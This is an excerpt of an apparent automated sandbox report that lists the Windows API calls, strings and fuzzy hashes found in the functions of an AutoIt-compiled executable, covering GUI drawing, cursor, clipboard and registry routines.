                                                                                                                                        • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                                                                                        • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                                                                                        • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                        • API String ID: 4040870279-2373415609
                                                                                                                                        • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                                                        • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                                                                                        • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                                                        • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                                                                                        APIs
                                                                                                                                        • GetSysColor.USER32(00000012), ref: 0044181E
                                                                                                                                        • SetTextColor.GDI32(?,?), ref: 00441826
                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00441849
                                                                                                                                        • SetBkColor.GDI32(?,?), ref: 00441864
                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00441874
                                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                                                                                        • GetSysColor.USER32(00000010), ref: 004418B2
                                                                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                                                                                        • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                                                                                        • DeleteObject.GDI32(?), ref: 004418D5
                                                                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                                                                                        • FillRect.USER32(?,?,?), ref: 00441970
                                                                                                                                          • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                                                          • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                                                          • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                                                          • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                                                          • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                                                                                          • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                                                          • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                                                          • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                                                          • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                                                          • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                                                          • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                                                          • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                                                          • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 69173610-0
                                                                                                                                        • Opcode ID: c8a6ac4ae8f443655677bc86ae764d03f57232e15dc5d5dcac45869bbcc4533b
                                                                                                                                        • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                                                                                        • Opcode Fuzzy Hash: c8a6ac4ae8f443655677bc86ae764d03f57232e15dc5d5dcac45869bbcc4533b
                                                                                                                                        • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                                                                                        APIs
                                                                                                                                        • DestroyWindow.USER32(?), ref: 004590F2
                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                                                                                        • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                                                                                        • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                                                                                        • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                        • API String ID: 2910397461-517079104
                                                                                                                                        • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                                                        • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                                                                                        • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                                                        • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wcsnicmp
                                                                                                                                        • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                                                                                        • API String ID: 1038674560-3360698832
                                                                                                                                        • Opcode ID: 60e7c0ccc2de36542d37a783a5f9e034653244a609c45985bfd1ff28648e5169
                                                                                                                                        • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                                                                                        • Opcode Fuzzy Hash: 60e7c0ccc2de36542d37a783a5f9e034653244a609c45985bfd1ff28648e5169
                                                                                                                                        • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                                                                                                        APIs
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                                                                                        • SetCursor.USER32(00000000), ref: 0043075B
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                                                                                        • SetCursor.USER32(00000000), ref: 00430773
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                                                                                        • SetCursor.USER32(00000000), ref: 0043078B
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                                                                                        • SetCursor.USER32(00000000), ref: 004307A3
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                                                                                        • SetCursor.USER32(00000000), ref: 004307BB
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                                                                                        • SetCursor.USER32(00000000), ref: 004307D3
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                                                                                        • SetCursor.USER32(00000000), ref: 004307EB
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                                                                                        • SetCursor.USER32(00000000), ref: 00430803
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                                                                                        • SetCursor.USER32(00000000), ref: 0043081B
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                                                                                        • SetCursor.USER32(00000000), ref: 00430833
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                                                                                        • SetCursor.USER32(00000000), ref: 0043084B
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                                                                                        • SetCursor.USER32(00000000), ref: 00430863
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                                                                                        • SetCursor.USER32(00000000), ref: 0043087B
                                                                                                                                        • SetCursor.USER32(00000000), ref: 00430887
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                                                                                        • SetCursor.USER32(00000000), ref: 0043089F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Cursor$Load
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1675784387-0
                                                                                                                                        • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                                                        • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                                                                                        • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                                                        • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                                                                                        APIs
                                                                                                                                        • GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                                                        • GetSysColor.USER32(00000012), ref: 00430933
                                                                                                                                        • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                                                        • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                                                                                        • GetSysColor.USER32(00000011), ref: 00430979
                                                                                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                                                        • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                                                        • SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                                                        • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                                                                                        • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                                                                                        • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                                                                                        • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                                                                                        • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                                                                                        • DeleteObject.GDI32(?), ref: 00430AE9
                                                                                                                                        • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                                                                                        • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1582027408-0
                                                                                                                                        • Opcode ID: 0fc54ca7880b8250f5455aad5081468a4898125874aa09f0f002b05b6088d479
                                                                                                                                        • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                                                                                        • Opcode Fuzzy Hash: 0fc54ca7880b8250f5455aad5081468a4898125874aa09f0f002b05b6088d479
                                                                                                                                        • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                                                                                        APIs
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseConnectCreateRegistry
                                                                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                        • API String ID: 3217815495-966354055
                                                                                                                                        • Opcode ID: cc51306d31ed6c8e05796ddcf504f705dab8229ec76f85ad91dfb98ceec273a0
                                                                                                                                        • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                                                                                        • Opcode Fuzzy Hash: cc51306d31ed6c8e05796ddcf504f705dab8229ec76f85ad91dfb98ceec273a0
                                                                                                                                        • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                                                                                        APIs
                                                                                                                                        • GetCursorPos.USER32(?), ref: 004566AE
                                                                                                                                        • GetDesktopWindow.USER32 ref: 004566C3
                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                                                                                        • DestroyWindow.USER32(?), ref: 00456746
                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                                                                                        • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                                                                                        • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                                                                                        • IsWindowVisible.USER32(?), ref: 0045682C
                                                                                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                                                                                        • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00456873
                                                                                                                                        • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                                                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                                                                                        • CopyRect.USER32(?,?), ref: 004568BE
                                                                                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                                                        • String ID: ($,$tooltips_class32
                                                                                                                                        • API String ID: 225202481-3320066284
                                                                                                                                        • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                                                        • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                                                                                        • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                                                        • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                                                                                        APIs
                                                                                                                                        • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                                                        • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                                                        • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                                                        • CloseClipboard.USER32 ref: 0046DD41
                                                                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                                                        • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                                                        • CloseClipboard.USER32 ref: 0046DD99
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 15083398-0
                                                                                                                                        • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                                                        • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                                                                                        • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                                                        • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00471D05
                                                                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00471D0D
